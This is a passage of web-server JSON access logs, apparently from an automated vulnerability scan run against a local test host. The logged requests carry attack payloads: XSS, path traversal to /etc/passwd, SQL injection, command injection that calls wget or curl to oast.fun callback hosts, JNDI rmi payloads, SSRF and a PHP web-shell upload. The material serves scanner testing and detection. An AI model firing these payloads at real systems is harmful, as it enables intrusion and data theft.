"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTxeEp2EBGeybedUifFgKKb7.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://c9v8h8gsmpv8c1qg07h0b3n4et71chdzb.oast.fun%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://c9v8h8gsmpv8c1qg07h0i17gnyrudfuww.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://c9v8h8gsmpv8c1qg07h0m6iz7tqhq4aig.oast.fun\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0ugm8segh8dtj6.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://c9v8h8gsmpv8c1qg07h053kjf9bd1oiib.oast.fun&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8h8gsmpv8c1qg07h0uredxoiyiomqf.oast.fun #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h03ks1o7c5qnky9.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://c9v8h8gsmpv8c1qg07h09w3wyxkxcobu9.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"sondata[ip]=a|curl c9v8h8gsmpv8c1qg07h0z66z9rduibgh9.oast.fun&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x22297MU3cK8JDhxkSSTPx1CrvP1oQ.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://c9v8h8gsmpv8c1qg07h05ucdhahsjc3kk.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8h8gsmpv8c1qg07h0agfwyibo1wi8u.oast.fun #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) 